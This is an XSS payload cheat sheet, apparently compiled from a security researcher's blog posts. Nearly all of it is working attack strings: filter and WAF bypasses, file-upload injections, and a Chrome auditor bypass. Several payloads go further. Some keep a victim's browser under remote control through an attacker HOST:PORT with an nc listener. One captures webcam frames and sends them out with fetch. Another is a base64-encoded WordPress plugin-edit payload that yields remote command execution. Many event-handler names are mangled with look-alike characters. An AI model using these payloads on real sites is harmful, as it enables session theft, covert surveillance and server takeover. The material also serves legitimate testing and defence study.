XSS Cheat Sheet
XSS 101
<h1>Hello,<script>alert(1)</script>!</h1>
1. With <script> tag
<script>alert(1)</script>
2. With regular HTML tags
2.1 Event-based
<TAG EVENT=alert(1)>
<body οnlοad=alert(1)>
<img src=1 οnerrοr=alert(1)>
<svg οnlοad=alert(1)>
<x οnmοuseοver=alert(1)>
2.2 Resource-based
<TAG RESOURCE=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<script>alert(document.domain)</script>
2.1. Steal an user session on the vulnerable website (including admins)
2.2. Capture the keys pressed by the user
2.3. Deface the page, serving any type of content
2.4. Trick the user into giving his/her credentials by means of a fake HTML form
2.5. Crash the browser (local denial of service)
2.6. Force download of files
2.7. Redirect user's browser to another website where his/her machine can be
compromised by memory exploits
data■■■■■■■■
data:[<MIME-type>][;charset=<encoding>][;base64],<data>
<script src="data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script>
<script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
<script src=data:text/html;,alert(document.cookie)></script>
<script src=data:text/html,alert(document.cookie)></script>
<script src=data:,alert(document.cookie)></script>
<script src="data:text/html;base64,YWxlcnQoMSk="></script>
<script src=data:text/html;base64,YWxlcnQoMSk=></script>
<script src=data:text/html;,alert(1)></script>
<script src=data:text/html,alert(1)></script>
<script src=data:,alert(1)></script>
<body><svg><x><script>alert(1)</script></x></svg></body>
<svg><x><script>alert(1)</x>
<svg><a><script>alert(1)</a>
XSS Cheat Sheet
HTML Context Tag Injection
<svg οnlοad=alert(1)>
"><svg οnlοad=alert(1)//
HTML Context Inline Injection
"οnmοuseοver=alert(1)//
"autofocus/οnfοcus=alert(1)//
Javascript Context Code Injection
'-alert(1)-'
'-alert(1)//
Javascript Context Code Injection (escaping the escape)
\'-alert(1)//
Javascript Context Tag Injection
</script><svg οnlοad=alert(1)>
PHP_SELF Injection
http://DOMAIN/PAGE.php/"><svg οnlοad=alert(1)>
Without Parenthesis
<svg οnlοad=alert`1`>
<svg οnlοad=alert(1)>
<svg οnlοad=alert(1)>
<svg οnlοad=alert(1)>
Filter Bypass Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
Body Tag
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
<body οnfοcus=alert(1)>
<body οnhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px οnscrοll=alert(1) id=x>#x
<body οnscrοll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body οnresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src οnlοadstart=alert(1)>
<video οnlοadstart=alert(1)><source>
<input autofocus οnblur=alert(1)>
<keygen autofocus οnfοcus=alert(1)>
<form οnsubmit=alert(1)><input type=submit>
<select οnchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x οnshοw=alert(1)>right click me!
Agnostic Event Handlers
<x contenteditable οnblur=alert(1)>lose focus!
<x οnclick=alert(1)>click this!
<x οncοpy=alert(1)>copy this!
<x οncοntextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x οndblclick=alert(1)>double click this!
<x οndrag=alert(1)>drag this!
<x contenteditable οnfοcus=alert(1)>focus this!
<x contenteditable οninput=alert(1)>input here!
<x contenteditable οnkeydοwn=alert(1)>press any key!
<x contenteditable οnkeypress=alert(1)>press any key!
<x contenteditable οnkeyup=alert(1)>press any key!
<x οnmοusedοwn=alert(1)>click this!
<x οnmοusemοve=alert(1)>hover this!
<x οnmοuseοut=alert(1)>hover this!
<x οnmοuseοver=alert(1)>hover this!
<x οnmοuseup=alert(1)>click this!
<x contenteditable οnpaste=alert(1)>paste here!
Agnostic Event Handlers
<brute contenteditable οnblur=alert(1)>lose focus!
<brute οnclick=alert(1)>click this!
<brute οncοpy=alert(1)>copy this!
<brute οncοntextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute οndblclick=alert(1)>double click this!
<brute οndrag=alert(1)>drag this!
<brute contenteditable οnfοcus=alert(1)>focus this!
<brute contenteditable οninput=alert(1)>input here!
<brute contenteditable οnkeydοwn=alert(1)>press any key!
<brute contenteditable οnkeypress=alert(1)>press any key!
<brute contenteditable οnkeyup=alert(1)>press any key!
<brute οnmοusedοwn=alert(1)>click this!
<brute οnmοusemοve=alert(1)>hover this!
<brute οnmοuseοut=alert(1)>hover this!
<brute οnmοuseοver=alert(1)>hover this!
<brute οnmοuseup=alert(1)>click this!
<brute contenteditable οnpaste=alert(1)>paste here!
<brute style=font-size:500px οnmοuseοver=alert(1)>0000
<brute style=font-size:500px οnmοuseοver=alert(1)>0001
<brute style=font-size:500px οnmοuseοver=alert(1)>0002
<brute style=font-size:500px οnmοuseοver=alert(1)>0003
Code Reuse Inline Script
<script>alert(1)//
<script>alert(1)<!–
Code Reuse Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass Generic Tag + Handler
Encoding
<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
Mixed Case
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
Doubling
<x onxxx=1 onxxx=1
Spacers
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes
<x 1='1'onxxx=1
<x 1="1"onxxx=1
Stripping
<[S]x onx[S]xx=1
[S] = stripped char or string
Mimetism
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
Generic Source Breaking
<x onxxx=alert(1) 1='
Source-Breaking Injections
onafterscriptexecute
onbeforescriptexecute
if (brute)
alert("Congratz, buddy!");
else
alert("Almost there, try again.");
Browser Control
<svg οnlοad=setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Using XSS to Control a Browser
<svg οnlοad=setInterval(function(){d=document;
z=d.createElement("script");z.src="//HOST:PORT";
d.body.appendChild(z)},0)>
setInterval(code, 0)
function(){code}
d=document;
z=d.createElement("script");
z.src="//HOST:PORT";
d.body.appendChild(z)
<svg/οnlοad=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:PORT"},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection
Double Reflection
Single Input
'οnlοad=alert(1)><svg/1='
Single Input (script-based)
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
Triple Reflection
Single Input
*/alert(1)">'οnlοad="/*<svg/1='
`-alert(1)">'οnlοad="`<svg/1='
Single Input (script-based)
*/</script>'>alert(1)/*<script/1='
Multi Input
Double Input
p=<svg/1='&q='οnlοad=alert(1)>
Triple Input
p=<svg 1='&q='οnlοad='/*&r=*/alert(1)'>
Multi Reflection XSS
<svg οnlοad=write(1)>
p='οnlοad=alert(1)><svg/1='
'οnlοad=alert(1)><svg/1='
… [code] …
'οnlοad=alert(1)><svg/1='
p='>alert(1)</script><script/1='
p=*/alert(1)</script><script>/*
*/alert(1)</script><script>/*
… [code] …
*/alert(1)</script><script>/*
p=*/alert(1)">'οnlοad="/*<svg/1='
p=`-alert(1)">'οnlοad="`<svg/1='
`-alert(1)">'οnlοad="`<svg/1='
… [code] …
`-alert(1)">'οnlοad="`<svg/1='
… [code] …
`-alert(1)">'οnlοad="`<svg/1='
p=*/</script>'>alert(1)/*<script/1='
*/</script>'>alert(1)/*<script/1='
… [code] …
*/</script>'>alert(1)/*<script/1='
… [code] …
*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='οnlοad=alert(1)>
p=<svg 1='&q='οnlοad='/*&r=*/alert(1)'>
var n = {a: "$p", b: "$p"};
(double reflection, single input $p)
var n = {a: "$p", b: "$q"};
(double reflection, double input $p and $q)
INPUT
p=-alert(1)}//\
RESULT*
var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"};
INPUT
p=\&q=-alert(1)//
RESULT*
var n = {a: "\", b: "-alert(1)}//"};
Without Event Handlers
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/οnlοad=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
XSS Without Event Handlers
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
1) (no attribute)
<script>alert(1)</script>
2) src
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)> *
3) href
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click *
4) action
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click> *
5) formaction
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindex formaction=javascript:alert(1) type=submit value=click> *
6) data
<object data=javascript:alert(1)> *
7) srcdoc
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
8) xlink:href
<svg><script xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data:,alert(1) /> *
<math><brute xlink:href=javascript:alert(1)>click *
9) from
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientatiοnchange=alert(1)>
Javascript
Properties
<svg οnlοad=alert(navigator.connection.type)>
<svg οnlοad=alert(navigator.battery.level)>
<svg οnlοad=alert(navigator.battery.dischargingTime)>
<svg οnlοad=alert(navigator.battery.charging)>
Functions
<svg οnlοad=navigator.vibrate(500)>
<svg οnlοad=navigator.vibrate([500,300,100])>
XSS in Mobile Devices
<body onorientatiοnchange=alert(orientation)>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<svg οnlοad=alert(navigator.connection.type)>
<svg οnlοad=alert(navigator.battery.level)>
<svg οnlοad=alert(navigator.battery.dischargingTime)>
<svg οnlοad=alert(navigator.battery.charging)>
<script>
navigator.geolocation.getCurrentPosition(function(p){
alert('Latitude:'+p.coords.latitude+',Longitude:'+
p.coords.longitude+',Altitude:'+p.coords.altitude);})
</script>
<script>
d=document;
v=d.createElement('video');
c=d.createElement('canvas');
c.width=640;
c.height=480;
navigator.webkitGetUserMedia({'video':true},function(s){
v.src=URL.createObjectURL(s);v.play()},function(){});
c2=c.getContext('2d');
x='c2.drawImage(v,0,0,640,480);fetch("//HOST/"+c2.canvas.toDataURL())';
setInterval(x,5000);
</script>
open(c2.canvas.toDataURL())
<svg οnlοad=navigator.vibrate(500)>
<svg οnlοad=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS
<iframe src=LOGOUT_URL οnlοad=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
Leveraging Self-XSS
POST to GET
Copy & Paste
XSS + CSRF
<iframe src=LOGOUT_URL οnlοad=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
<iframe src=//localhost/self/logout.php
οnlοad=forms[0].submit()></iframe><form method=POST
action=//localhost/self/login.php?returnURL=changemail.php>
<input name=username value=brute>
<input name=password value=logic>
File Upload
Injection in Filename
"><img src=1 οnerrοr=alert(1)>.gif
Injection in Metadata
$ exiftool -Artist='"><img src=1 οnerrοr=alert(1)>' FILENAME.jpeg
Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" οnlοad="alert(document.domain)"/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/οnlοad=alert(1)>*/=alert(document.domain)//;
File Upload XSS
1) Filename
2) Metadata
$ exiftool -FIELD=XSS FILE
$ exiftool -Artist=' "><img src=1 οnerrοr=alert(document.domain)>' brute.jpeg
3) Content
<svg xmlns="http://www.w3.org/2000/svg" οnlοad="alert(document.domain)"/>
4) Source
GIF89a/*<svg/οnlοad=alert(1)>*/=alert(document.domain)//;
Google Chrome Auditor Bypass (up to v51)
<script src="data:,alert(1)//
"><script src=data:,alert(1)//
<script src="//brutelogic.com.br/1.js#
"><script src=//brutelogic.com.br/1.js#
<link rel=import href="data:text/html,<script>alert(1)</script>
"><link rel=import href=data:text/html,<script>alert(1)</script>
Chrome XSS Bypass
"><script src=data:%26comma;alert(1)-"
<input value="INPUT">
<input value=""><script src=data:%26comma;alert(1)-"">
<script src="URL"></script>
<script type="text/javascript"></script>
PHP File for XHR Remote Call
<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 οnerrοr=alert(1)>
CORS Enabled XSS
<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 οnerrοr=alert(document.domain)>
#data:text/html,<img src=1 οnerrοr=alert(document.domain)
Server Log Avoidance
<svg οnlοad=eval(URL.slice(-8))>#alert(1)
<svg οnlοad=eval(location.hash.slice(1)>#alert(1)
<svg οnlοad=innerHTML=location.hash>#<script>alert(1)</script>
Avoiding XSS Detection
with(document)body.appendChild(createElement('script')).src='//DOMAIN'
<svg/οnlοad=eval(location.hash.slice(1))>#with(document)
body.appendChild(createElement('script')).src='//DOMAIN'
#with(document)body.appendChild(createElement
(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
<svg/οnlοad=eval(atob(location.hash.slice(1)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=
<svg/οnlοad=eval(atob(URL.slice(-148)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=
Shortest PoC
<base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done
Portable Wordpress RCE
<script/src="data:,eval(atob(location.hash.slice(1)))//#
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
* In URLs:
& => %26 , # => %23 , + => %2B
<a href=javascript:alert(1)>
Javascript:alert(1)
(URL-encoded form)
Javas%26%2399;ript:alert(1)
<iframe src=javascript:alert(1)>
http(s)://host/page?p=XSS
<object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>
"><iframe src="/tests/cors/%23/tests/auditor.php?q1=<img/src=x οnerrοr=alert(1)"
%0aalert(1);/"><script>///
<form action="http://brutelogic.com.br/chall/minified.php" method="POST" enctype="multipart/form-data">
<textarea name=p id=p>"
alert(1)-/><script>///</textarea>
</form>
<script>document.forms[0].submit(); </script>
*//"><script>/*alert(1)//
</input/"><svg><script>alert(1)//
Calling Remote Script With Event Handlers
1 – XHR
"var x=new XMLHttpRequest();x.open('GET','//0');x.send();
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"
2 – Fetch
fetch('//0').then(function(r){r.text().then(function(w){write(w)})})
3 – Create Element
with(top)body.appendChild (createElement('script')).src='//0'
4 – jQuery Get
$.get('//0',function(r){write(r)})>
5 – jQuery Get Script
$.getScript('//0')
The Easiest Way to Bypass XSS Mitigations
echo $_GET["p"];
echo str_replace(" ", "", $_GET["q"]);
echo $_GET["p"];
echo str_ireplace("<script", "", $_GET["q"]);
echo str_ireplace("<script","InvalidTag", $_GET["r"]);
echo str_ireplace("<script","<InvalidTag", $_GET["s"]);
XSS Authority Abuse
http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+οnlοad=eval(URL.slice(7,15))>
http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+οnlοad=location=URL.slice(7,26)>
Bypassing Javascript Overrides
<svg οnlοad=alert(1)>
<svg οnlοad=document.write('XSS')>
<svg οnlοad=document.writeln(decodeURI(location.hash))>#<img src=1 οnerrοr=alert(1)>
The Shortest Reflected XSS Attack Possible
<script src="INPUT"></script
<script src="//INPUT"></script>
<base href=//0>
Transcending Context-Based Filters
1) among tags
2) inside a tag
3) in a script section
1) preg_replace("/\<script|=/i", "-", $_REQUEST['q']);
2) preg_replace("/on\w+\s*=|\>/i", "-", $_REQUEST['q']);
3) htmlspecialchars($_REQUEST['q'], ENT_QUOTES);
<math><brute href=javascript:alert(1)>
1) <math>
2) " href=javascript:alert(1)
1) <math><!–
2) " href=javascript:alert(1)
<math><!–" href=javascript:alert(1)//
" href=javascript:alert(1) <math><!–
lol video<!–"href=javascript:alert(1) style=font-size:50px;
display:block;color:transparent;
background:url('//brutelogic.com.br/webgun/img/youtube1.jpg');
background-repeat:no-repeat –><math><!–
<svg><!–'-alert(1)-'
'-alert(1)-'<svg><!–
" accesskey=x οnclick=alert(1) 1='
Location Based Payloads – Part IV
Document Properties Scheme
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3
previousSibling.nodeValue, document.body.textContent*
location.search, tagName, nodeName, outerHTML
textContent, nextSibling.nodeValue, firstChild.nodeValue, lastChild.nodeValue, innerHTML
location.hash
Location Based Payloads – Part III
– Location
– Location Self
– Location Self Plus
before < [itself [inside]] > after # hash
Before: everything before the tag.
Itself: anything that uses the tag name.
Inside: any attribute inside the tag.
After: everything after the tag until hash.
Hash: everything after the # sign.
1) Location
1.1) Location Itself+After+Hash (tagName+innerHTML+location.hash)
<javascript οnclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
<javascript οnclick=location=tagName%2binnerHTML%2blocation.hash>:'click me!#'-alert(9)
1.2) Location Itself+Hash (tagName+URL)
<javascript: οnclick=location=tagName%2bURL>click me!#%0Aalert(1)
javascript: + http://domain/page?p=<javascript: οnclick=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript:"-' οnclick=location=tagName%2bURL>click me!#'-alert(1)
javascript:"-' + http://domain/page?p=<javascript:"-' οnclick=location=tagName%2bURL>click me!#'-alert(1)
1.3) Location After+Hash (innerHTML+URL)
<j οnclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
javascript:"-'click me! + http://domain/page?p=<j οnclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
<j οnclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
javascript: + http://domain/page?p=<j οnclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
1.4) Location Itself+After+Hash (tagName+innerHTML+URL)
<javas οnclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
javas + cript:"-'click me! + http://domain/page?p=<javas%20οnclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
<javas οnclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
javas + cript: + http://domain/page?p=<javas οnclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
1.5) Location Itself+Before (tagName+previous.Sibling)
"-alert(1)<javascript:" οnclick=location=tagName%2bpreviousSibling.nodeValue>click me!
javascript:" + "-alert(1)
1.6) Location Itself+After+Before (tagName+innerHTML+previous.Sibling)
"-alert(1)<javas οnclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:"click me!
javas + cript:" + "-alert(1)
1.7) Location After+Itself (innerHTML+outerHTML)
<alert(1)<!– οnclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!–>
javascript:1/*click me!*/ + <alert(1)<!– οnclick=location=innerHTML%2bouterHTML>
<j 1="*/""-alert(1)<!– οnclick=location=innerHTML%2bouterHTML>javascript:/*click me!
javascript:/* + <j 1="*/""-alert(1)<!– οnclick=location=innerHTML%2bouterHTML>
1.8) Location After+Before+Itself (innerHTML+previousSibling+outerHTML)
*/"<j"-alert(1)<!– οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
javascript:/*click me! + */" + <x"-alert(9)<!– οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
*/"<j 1=-alert(9)// οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
javascript:/*click me! + */" + <x 1=" -alert(9)//" οnclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
1.9) Location After (innerHTML)
<j οnclick=location=innerHTML>javascript%26colon;alert(1)//
javascript:alert(1)//
1.10) Location Inside (name+id)
<iframe id=t:alert(1) name=javascrip οnlοad=location=name%2bid>
javascrip + t:alert(1)
2) Location Self
2.1) Location Self Inside
<svg id=?p=<svg/οnlοad=alert(1)%2B οnlοad=location=id>
http://domain/page?p=<svg/οnlοad=alert(1)+
<svg id=?p=<script/src=//3237054390/1%2B οnlοad=location=id>
http://domain/page?p=<script/src=//3237054390/1+
2.2) Location Self After
<j οnclick=location=textContent>?p=%26lt;svg/οnlοad=alert(1)>
http://domain/page?p=<svg/οnlοad=alert(1)>
3) Location Self Plus
3.1) Location Self Plus Itself
<j%26p=<svg%2Bοnlοad=alert(1) οnclick=location%2B=outerHTML>click me!
http://domain/page?p=<j%26p=<svg%2Bοnlοad=alert(1)%20οnclick=location%2B=outerHTML>click%20me!<j&p=<svg+οnlοad=alert(1) οnclick="location+=outerHTML">
3.2) Location Self Plus After
<j οnclick=location%2B=textContent>%26p=%26lt;svg/οnlοad=alert(1)>
http://domain/page?p=<j%20οnclick=location%2B=textContent>%26p=%26lt;svg/οnlοad=alert(1)>&p=<svg/οnlοad=alert(1)>
3.3) Location Self Plus Before
%26p=%26lt;svg/οnlοad=alert(1)><j οnclick=location%2B=document.body.textContent>click me!
http://domain/page?p=%26p=%26lt;svg/οnlοad=alert(1)><j%20οnclick=location%2B=document.body.textContent>click%20me![BODY_CONTENT]&p=<svg/οnlοad=alert(1)>click me!
Location Based Payloads – Part II
<svg οnlοad=alert(tagName)>
<javascript οnclick=alert(tagName)>click me!
<javascript οnclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
<javascript: οnclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
<javascript: οnclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<javascript: οnclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
Result => javascript: + /*click me! + #*/alert(1)
<javascript: οnclick=location=tagName%2BinnerHTML%2Blocation.hash>'click me!#'-alert(1)
Result => javascript: +'click me! + #'-alert(1)
<javascript: οnclick=alert(tagName%2BinnerHTML%2Blocation.hash)>'click me!</javascript:>#'-alert(1)
javascript + :'click me! + #'-alert(1)
javascrip + t:'click me! + #'-alert(1)
javas + cript:'click me! + #'-alert(1)
Location Based Payloads – Part I
<svg/οnlοad=location='javascript:alert(1)'>
<svg/οnlοad=location=location.hash.substr(1)>#javascript:alert(1)
Result => javascript:alert(1)
<svg/οnlοad=location='javas'%2B'cript:'%2B
'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)
Result => javas + cript: + ale + rt + (1)
<svg/οnlοad=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
Result => javas + script: + ale + rt + (1)
<svg/οnlοad=location=/javas/.source%2B/cript:/.source%2B/ale/.source
%2B/rt/.source%2Blocation.hash[1]%2B1%2Blocation.hash[2]>#()
Result => javas + cript: + ale + rt + ( + 1 + )
Filter Bypass Procedure
#XSS vs WAF
1) use <x & jump to event handler
2) use onxxx=yyy & find number of x it accepts
3) test them & change tag accordingly
4) put js
— Brute (@brutelogic) October 10, 2015
<x onxxx=1
Example:
<x onxxx=1 -> pass
<x onxxxx=1 -> pass
<x onxxxxx=1 -> block
Event handlers with up to 6 chars:
oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
1) Encoding
<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
2) Mixed Case
<X onxxx=1
<x ONxxx=1
<x OnXxx=1
<X OnXxx=1
3) Doubling
<x onxxx=1 onxxx=1
4) Spacers
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
5) Quotes
<x 1='1'onxxx=1
<x 1="1"onxxx=1
6) Mimetism
<x </onxxx=1 (mimics a closing tag)
<x 1=">" onxxx=1 (mimics a text outside of the tag)
<http://onxxx%3D1/ (mimics an URL)
7) Combo
<x%2F1=">%22OnXxx%3D1
Existing Code Reuse
<script>alert(1)//
<script>alert(1)<!–
1) Before injection:
<input type="text" value=""><script type="text/javascript"> function x(){ do something }</script>
2) After injection:
<input type="text" value=""><script>alert(1)//"><script type="text/javascript"> function x(){ do something }</script>
<script src=//brutelogic.com.br/1>
<script src=//3334957647/1>
http://brutelogic.com.br/webgun/test.php?p=<script src=//3334957647/1>
http://brutelogic.com.br/webgun/test.php?p=<brute id=test οnmοuseοver=alert(1)>AAAA
http://brutelogic.com.br/webgun/test.php?p=<brute οnmοuseοver=pop(1)>AAAA
XSS Payload Scheme
<tag handler=code>
<b οnclick=alert(1)>click me!
<img src=x οnerrοr=alert(1)>
<frameset><frame src οnlοad=alert(1)>
extra1 <tag extra2 handler=code> extra3
extra1 <tag handler=code extra2> extra3
<svg/οnlοad=alert(1)>
extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
extra1 <tag spacer1 handler spacer3 = spacer4 code spacer5 extra2> extra3 (without spacer2)
<table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bconfirm(1)%09><td>AAAAAAAAA